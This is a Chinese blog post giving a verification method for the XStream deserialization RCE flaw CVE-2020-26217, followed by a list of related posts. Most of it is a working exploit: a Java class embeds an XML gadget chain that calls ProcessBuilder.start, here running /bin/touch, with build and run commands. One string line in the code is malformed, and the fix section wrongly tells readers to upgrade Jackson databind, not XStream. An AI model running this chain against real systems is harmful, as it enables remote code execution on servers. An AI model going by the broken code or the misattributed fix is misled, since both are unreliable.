关于XStream < 1.4.14 远程代码执行高危漏洞(CVE-2020-26217)的详细验证方法

于 2025-02-08 14:31:11 发布
阅读量302 收藏 6
点赞数 8
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Lisoning/article/details/145514988
版权

注:本文仅可用于学习使用。

XStream 是 Java 类库,用来将对象序列化成 XML ( JSON )或反序列化为对象。攻击者通过构造恶意的 XML,在受影响的 XStream 版本中绕过默认黑名单,触发远程代码执行。

一、漏洞原理

XStream 反序列化功能的一个关键点在于它能够从 XML 数据流中恢复原始 Java 对象。当 XStream 序列化 Java 对象时,它会将对象的状态写入 XML 格式。当这些对象被反序列化时,XStream 会重建原始对象,并恢复对象的状态。

CVE-2020-26217 漏洞的根本问题出现在 XStream 的 XML 反序列化过程中,特别是 XStream 没有有效地验证和过滤 XML 输入数据中的潜在恶意内容。恶意用户可以通过构造特殊的 XML 数据,利用不安全的反序列化机制来执行任意代码,导致远程代码执行。

 影响范围:

XStream < 1.4.14,小版本也需要加黑名单如:1.4.11.1

二、验证过程

1、首先wget所需XStream的jar包以及依赖所需jar包

XStream:wget https://search.maven.org/remotecontent?filepath=com/thoughtworks/xstream/xstream/1.4.13/xstream-1.4.13.jar
xmlpull:wget https://search.maven.org/remotecontent?filepath=xmlpull/xmlpull/1.1.3.1/xmlpull-1.1.3.1.jar
xpp3_min:wget https://search.maven.org/remotecontent?filepath=xpp3/xpp3_min/1.1.4c/xpp3_min-1.1.4c.jar

2、验证代码:

import com.thoughtworks.xstream.XStream;

public class VulnerabilityTest {
    public static void main(String[] args) {
        String xml = "<map>\n" +
                "  <entry>\n" +
                "    <jdk.nashorn.internal.objects.NativeString>\n" +
                "      <flags>0</flags>\n" +
                "      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n" +
                "        <dataHandler>\n" +
                "          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n" +
                "            <contentType>text/plain</contentType>\n" +
                "            <is class='java.io.SequenceInputStream'>\n" +
                "              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\n" +
                "                <iterator class='javax.imageio.spi.FilterIterator'>\n" +
                "                  <iter class='java.util.ArrayList$Itr'>\n" +
                "                    <cursor>0</cursor>\n" +
                "                    <lastRet>-1</lastRet>\n" +
                "                    <expectedModCount>1</expectedModCount>\n" +
                "                    <outer-class>\n" +
                "                      <java.lang.ProcessBuilder>\n" +
                "                        <command>\n" +
                "                          <string>/bin/touch</string>\n" + // 修改为 Linux 命令
                "                          <string>/tmp/test.txt</string>  <!-- 创建文件的路径 -->
                "                        </command>\n" +
                "                      </java.lang.ProcessBuilder>\n" +
                "                    </outer-class>\n" +
                "                  </iter>\n" +
                "                  <filter class='javax.imageio.ImageIO$ContainsFilter'>\n" +
                "                    <method>\n" +
                "                      <class>java.lang.ProcessBuilder</class>\n" +
                "                      <name>start</name>\n" +
                "                      <parameter-types/>\n" +
                "                    </method>\n" +
                "                    <name>start</name>\n" +
                "                  </filter>\n" +
                "                  <next/>\n" +
                "                </iterator>\n" +
                "                <type>KEYS</type>\n" +
                "              </e>\n" +
                "              <in class='java.io.ByteArrayInputStream'>\n" +
                "                <buf></buf>\n" +
                "                <pos>0</pos>\n" +
                "                <mark>0</mark>\n" +
                "                <count>0</count>\n" +
                "              </in>\n" +
                "            </is>\n" +
                "            <consumed>false</consumed>\n" +
                "          </dataSource>\n" +
                "          <transferFlavors/>\n" +
                "        </dataHandler>\n" +
                "        <dataLen>0</dataLen>\n" +
                "      </value>\n" +
                "    </jdk.nashorn.internal.objects.NativeString>\n" +
                "    <string>test</string>\n" +
                "  </entry>\n" +
                "</map>";

        XStream xstream = new XStream();
        xstream.fromXML(xml);
    }
}

以上验证代码,漏洞如果存在会自动创建文件在/tmp/test.txt

编译

javac -cp xstream-1.4.13.jar:xmlpull-1.1.3.1.jar:xpp3_min-1.1.4c.jar VulnerabilityTest.java

运行代码:

java -cp .:xstream-1.4.13.jar:xmlpull-1.1.3.1.jar:xpp3_min-1.1.4c.jar VulnerabilityTest

检验是否生产文件

ls /tmp/test.txt

漏洞验证完成。

三、修复建议

升级版本;

pom.xml 中更新 Jackson 的版本为一个安全版本:

<dependency>
    <groupId>com.fasterxml.jackson.core</groupId>
    <artifactId>jackson-databind</artifactId>
    <version>2.10.0</version> <!-- 更新为安全版本 -->
</dependency>

Lisoning
关注
NextGen Mirth Connect XStream反序列化远程代码执行漏洞(CVE-2023-43208)
0xSec
05-24 837
NextGen Mirth Connect 4.4.1之前版本存在远程代码执行漏洞,未经身份认证的攻击者可利用该漏洞远程执行代码。
XStream 反序列化远程命令执行漏洞复现(CVE-2021-21351)
weixin_43223153的博客
03-30 6045
XStream 反序列化远程命令执行漏洞复现 1. 漏洞影响版本 XStream <= 1.4.15 2. 环境搭建 安装漏洞靶场vulhub git clone git://github.com/vulhub/vulhub.git 3. 漏洞复现 1 进入到漏洞环境文件夹,启动漏洞环境。 cd /vulhub/xstream/CVE-2021-21351 docker-compose up -d 2 启动好之后,访问靶机的ip加8080端口 3 下载JNDI注入利用工具: 下载地址:https
CVE-2021-21351 XStream反序列化远程代码执行漏洞
m0_56642842的博客
08-13 2960
0x00 简介 XStream是Java类库,用来将对象序列化成XML (JSON)或反序列化为对象。XStream是自由软件,可以在BSD许可证的许可下分发。它是一种OXMapping 技术,是用来处理XML文件序列化的框架在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,使得XML序列化不再繁琐。 0x01 漏洞概述 在 1.4.16 版本之前的 XStream 中,存在一个漏洞,允许远程攻击者仅通过操纵处理后的输入流,解组时处理的流包含类型信息以重新创建以前编写的对
xstream xml转对象_【漏洞通告】XStream < 1.4.14 远程代码执行高危漏洞CVE202026217...
weixin_39764379的博客
12-12 662
文章转载自阿里云先知 概述20201116日,国内有关安全团队监测到XStream官方发布安全更新,修复了 CVE-2020-26217 XStream远程代码执行漏洞漏洞描述XStream是一个常用的Java对象和XML相互转换的工具。近日XStream官方发布安全更新,修复了 CVE-2020-26217 XStream远程代码执行漏洞。攻击者通过构造恶意的XML文...
xstream最新版本_【漏洞预警】XStream小于1.4.14远程代码执行漏洞CVE202026217
weixin_39819576的博客
11-28 1909
01漏洞概述近日,XSteam官方发布版本更新,修复了一个安全漏洞。该漏洞编号为CVE-2020-26217,其最初报告为CVE-2017-9805,即未初始化安全框架的XStream实例取消任务时,存在任意命令执行漏洞。02影响范围XStream < 1.4.1403安全版本XStream 1.4.1404修复建议官方已在最新版本中修复了该漏洞,请受影响的用户尽快通过下方链接升级...
XStream远程代码执行漏洞
m0_57768075的博客
06-18 1518
受影响系统: XStream XStream < 1.4.16 描述: -------------------------------------------------------------------------------CVE(CAN) ID: CVE-2021-21345 XStreamXStreamXstream)团队的一个轻量级的、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。XStream 1.4.16之前版本存在远程代码执行漏洞远程
CVE-2020-26217: XStream 远程代码执行漏洞通告
爱国小白帽
11-16 6117
原创360CERT[三六零CERT](javascript:void(0)???? 2020-11-16 12:09:18 报告编号:B6-2020-111601 报告来源:360CERT 报告作者:360CERT 更新日期:2020-11-16 0x01 漏洞简述 20201116日,360CERT监测发现 XStream 发布了 XStream 安全更新 的风险通告,该漏洞编号为 CVE-2020-26217漏洞等级:严重 ,漏洞评分:9.8 。 XStream 发布安全更新修复了一处反
XStream 代码问题漏洞CVE-2021-21345)
最新发布
FCH的博客
08-07 469
目前厂商已发布升级补丁以修复漏洞,建议受影响的用户,及时升级至1.4.16及以上版本。补丁获取链接:https://x-stream.github.io/download.html。这里我们在这边利用 exclusion 排除weixin-java-mp的子依赖,然后再单独引入指定版本xstream1,在idea中全文件搜索xstream中没有搜索到,可以在 idea tearminal 中执行命令,查找对应的依赖。xstream:jar:1.4.20 >= 官方建议升级版本1.4.16。
xstream 远程代码执行 CVE-2021-29505 已亲自复现
qq_42430287的博客
12-26 1675
burp发送数据包后,会返回500状态码,未发送前是200,可以根据此来判断是否存在漏洞点。
xstream-1.4.15.jar
01-28
XStream 反序列化漏洞CVE-2020-26258 & 26259),修复jar包 xstream-1.4.15.jar Xstream 是 Java 类库,用来将对象序列化成 XML (JSON) 或反序列化为对象。XStream 是一款开源软件,允许在 BSD 许可证的许可下分发。 0x01 漏洞描述 Xstream上次对CVE-2020-26217处理并不彻底,虽然通过黑名单方法阻止了远程代码执行,但是仍然可以采用类似思路实现文件删除与服务器请求伪造。 影响版本 Xstream = 1.4.15 风险等级 严重
xstream 远程代码执行CVE-2021-29505)
YouthBelief的博客
11-14 1506
这里写目录标题0x01 漏洞描述0x02 影响范围0x03 漏洞复现环境搭建0x04 漏洞修复 0x01 漏洞描述 0x02 影响范围 0x03 漏洞复现 环境搭建 0x04 漏洞修复
【组件攻击链】XStream组件高危漏洞分析与利用
further_eye的博客
12-01 3161
XStream组件漏洞主要是java反序列化造成的远程代码执行漏洞,目前官方通过黑名单的方式对java反序列化攻击进行防御,由于黑名单防御机制存在被绕过的风险,因此以后可能会出现类似java反序列化漏洞
XStream小于1.4.11远程代码执行高危漏洞问题
weixin_42855103的博客
05-18 2570
依赖树mvn dependency:help 起因: 接手了公共服务的众多项目后,这种线上的远程代码执行漏洞问题,上一个是fastjson的问题,没有什么体验,升级了版本号就上线了,这次到了XSteam,依旧按照这个流程来,但是上线前,师父问了我一句,你知道怎么判断这个依赖的添加对项目造成的影响吗? 后续说了什么就不重要了,重点记录下,这个问题后,我得到的答案和收获的体验 1 首先,项目中,没有对XSteam依赖明显的调用,无从下手这个版本过低会造成什么样的影响,也不知道之前为什么会添加这个依赖
XStream1.4.11 远程代码执行高危漏洞
dushan1234的专栏
09-24 1898
今天早上收到了腾讯云的短信,说系统监测到了漏洞,要去解决,登录腾讯云后,发现控制台首页的监控报警是0,最近30天的告警历史也是0,很奇怪,最后在腾讯云的文档中找到了漏洞。文档地址:腾讯云安全运营中心 漏洞如图, 解决顺序如下: 1.首先什么是XStream,我原先以为这个是系统引入的jar包,但是在pom文件中没有,没办法,在idea的Terminal中输入 mvn dependency:tree 查看项目的依赖树 再接着搜索XStream,找到了这个jar包, 往上看根目录,发现是spring-.
Struts2 REST 插件 XStream 远程代码执行漏洞 S2-052 复现过程
weixin_30871701的博客
09-08 626
Struts2 REST 插件 XStream 远程代码执行漏洞 S2-052 复现过程 参考文档:  S2-052的POC测试,高危Struts REST插件远程代码执行漏洞(S2-052)   http://blog.csdn.net/xwbk12/article/details/77862527?locationNum=3&fps=1  i春秋的报告...
腾讯蓝军安全通告|XStream远程代码执行漏洞(CVE-2021-29505)
Tencent_SRC的博客
05-17 5858
前言上周五XStream官方发布安全更新,由于官方把需要公告的CVE-2021-29505(任意代码执行漏洞)链接贴错成了CVE-2020-26258(SSRF漏洞)链接,导致很多人没有重...
ThinkPHP 5.0 * 远程代码执行漏洞分析
热门推荐
a1b2c3是弱口令
01-11 1万+
ThinkPHP 5.0 * 远程代码执行版本通杀 本文主要以官网下载的5.0.23 完整版(thinkphp_5.0.23_with_extend.zip)为例分析。 Thinkphp处理请求的关键类为Request(thinkphp/library/think/Request.php) 该类可以实现对HTTP请求的一些设置。 其中成员函数method用来获取当前请求类型,其定义如下: ...
CVE-2020-26259漏洞分析:XStream解组过程中的本地文件删除风险
资源摘要信息:"CVE-2020-26259...以上信息汇总了标题、描述和标签中所提到的关于CVE-2020-26259的知识点,以及提供了一个针对该漏洞详细分析和应对策略,希望能够帮助开发者理解和解决与XStream库相关的安全问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值